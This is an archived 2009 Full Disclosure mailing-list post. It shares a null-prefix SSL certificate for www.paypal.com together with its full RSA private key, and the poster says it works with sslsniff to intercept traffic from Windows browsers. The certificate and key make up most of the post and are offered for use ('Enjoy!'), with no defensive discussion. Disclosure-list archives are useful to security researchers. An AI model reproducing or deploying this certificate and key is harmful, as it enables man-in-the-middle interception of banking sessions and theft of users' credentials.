Full Disclosure mailing list archives
null-prefix certificate for paypal
From: Tim Jones <timjonesowns () yahoo com>
Date: Mon, 5 Oct 2009 10:59:31 -0700 (PDT)
If there's really a Moxie Marlinspike fan club [1], I'm definitely a member.. Attached is one of the null-prefix certificates [2] that he distributed during his "intercepting secure communication" training at Black Hat. This one's for www.paypal.com, and since the Microsoft crypto api appears to remain unpatched, it works flawlessly with sslsniff [3] against all clients on Windows (IE, Chrome, Safari). Also, because of Moxie's attacks against OCSP [4], I don't think this certificate can be revoked. Enjoy! [1]: http://www.linuxtoday.com/security/2009100102035NWNT [2]: http://www.thughtcrime.org/papers/null-prefix-attacks.pdf [3]: http://www.thoughtcrime.org/software/sslsniff/ [4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf -----BEGIN CERTIFICATE----- MIIGRDCCBa2gAwIBAgIDAPCbMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3 DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwMjI0MjMwNDE3WhcNMTEwMjI0 MjMwNDE3WjCBlDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU BgNVBAcTDVNhbiBGcmFuY2lzY28xETAPBgNVBAoTCFNlY3VyaXR5MRQwEgYDVQQL EwtTZWN1cmUgVW5pdDEvMC0GA1UEAxMmd3d3LnBheXBhbC5jb20Ac3NsLnNlY3Vy ZWNvbm5lY3Rpb24uY2MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJp+m86 ALQhG8ixAtc/GbLEbbRU+IuKzNtywp48YLnGkT2Ct32Z/9EphMFzU5yC3fwkjHfV QfPoHkKhrS2e/1sQJs6dVxdzFiM4yNbxuqOWWxZnSk9zlzpNFKT04j+LBYNC0dDc L3rlthCyEcDcISqQ/66XcVpJgaxA8zu4WbJPAgMBAAGjggMhMIIDHTAJBgNVHR ME AjAAMBEGCWCGSAGG+EIBAQQEAwIGQDALBgNVHQ8EBAMCA/gwEwYDVR0lBAwwCgYI KwYBBQUHAwEwHQYDVR0OBBYEFGGPYTRDVRR/JwnOTIvqm3sZJbxuMB8GA1UdIwQY MBaAFA4HYNQ5yRtbXZB7I8jSNJ1KmkY5MAkGA1UdEQQCMAAwHAYDVR0SBBUwE4ER Z2VuZXJhbEBpcHNjYS5jb20wcgYJYIZIAYb4QgENBGUWY09yZ2FuaXphdGlvbiBJ bmZvcm1hdGlvbiBOT1QgVkFMSURBVEVELiBDTEFTRUExIFNlcnZlciBDZXJ0aWZp Y2F0ZSBpc3N1ZWQgYnkgaHR0cHM6Ly93d3cuaXBzY2EuY29tLzAvBglghkgBhvhC AQIEIhYgaHR0cHM6Ly93d3cuaXBzY2EuY29tL2lwc2NhMjAwMi8wQwYJYIZIAYb4 QgEEBDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAy Q0xBU0VBMS5jcmwwRgYJYIZIAYb4QgEDBDkWN2h0dHBzOi8vd3d3Lmlwc2NhLmNv bS9pcHNjYTIwMDIvcmV2b2NhdGlvbkNMQVNFQTEuaHRtbD8wQwYJYIZIAYb4QgEH BDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvcmVuZXdhbENMQVNF QTEuaHRtbD8wQQYJYIZIAYb4QgEIBDQWMmh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9p cHNjYTIwMDIvcG9saWN5Q0xBU0VBMS5odG1sMIGDBgNVHR8EfDB6MDmgN6A1hjNo dHRwOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAyQ0xBU0VBMS5j cmwwPaA7o DmGN2h0dHA6Ly93d3diYWNrLmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBz Y2EyMDAyQ0xBU0VBMS5jcmwwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZo dHRwOi8vb2NzcC5pcHNjYS5jb20vMA0GCSqGSIb3DQEBBQUAA4GBAGjueZeX3Tvv FmoG8hSabs2eEveqgxC90XyY+seu1A4snjgFnVJgqZkKgbSYkB2uu0rXudyInjd4 QVv3gqXyukElWpAaHkU4oVJYdZQmRPsgB7pEzOVKLXI/mEf2JtwFRgUHYyGrRpuc eNVUWz0MHshkjLVQI4Jv27giHEOWB6i7 -----END CERTIFICATE----- -----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQDSafpvOgC0IRvIsQLXPxmyxG20VPiLiszbcsKePGC5xpE9grd9 mf/RKYTBc1Ocgt38JIx31UHz6B5Coa0tnv9bECbOnVcXcxYjOMjW8bqjllsWZ0pP c5c6TRSk9OI/iwWDQtHQ3C965bYQshHA3CEqkP+ul3FaSYGsQPM7uFmyTwIDAQAB AoGAcqDnnOaVcYxD7Z55NLgckOYv+bj8ulCAb+DiI4AzFaIWh9MJkXRvCAy9VQI1 /6LPukhS+gmE55KBwb0AckUXSRC4DuPXOhgT6ywyEJGQp6IdaQmC4NoyC+G4GPnr h0YISVKTT1ppRgjF6tpaFvElGTse+yejtKAssduT45MoxGkCQQDx58UFfPCVwAho J7/4TXpEebYs/BuLKYwQKUuQe1B+dV2WtSaub+jbSSpRVScTpyfKRwN0w4UZzs/6 4Zzs/erbAkEA3qx8uhMy7Dxu8zWx+C1b5LSh4Rf4sCvXug/nx3opvahO89iP5P6L MVplaVsVPwligUEaMsx9rJEJvt48sMEenQJBAOQlE6MOZ5TETOl2e84BvEuygodA qfWAlLF1UOgN9SefJ0oIxVeFAhc2lOuqJLWbU6KpgO/xqqlhbLOPbsHw5DsCQDj0 j5acsIrCTnLBCjt7hqSyGzHTCtYs8KnzxYo9Ug3jzgYLH4soHHxMLeJL3NxZzytW dpgFvCN2mbKLb6SaUPUCQQCKjbXoN7DkBbk8wU0ZY5fGCtLEUHtEmT93nFgmUvQ3 ZSB/EvhtWRPcWGdRC5tj0YxaUFevVhZA/Ng1d1JzbcKB -----END RSA PRIVATE KEY-----
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- null-prefix certificate for paypal Tim Jones (Oct 05)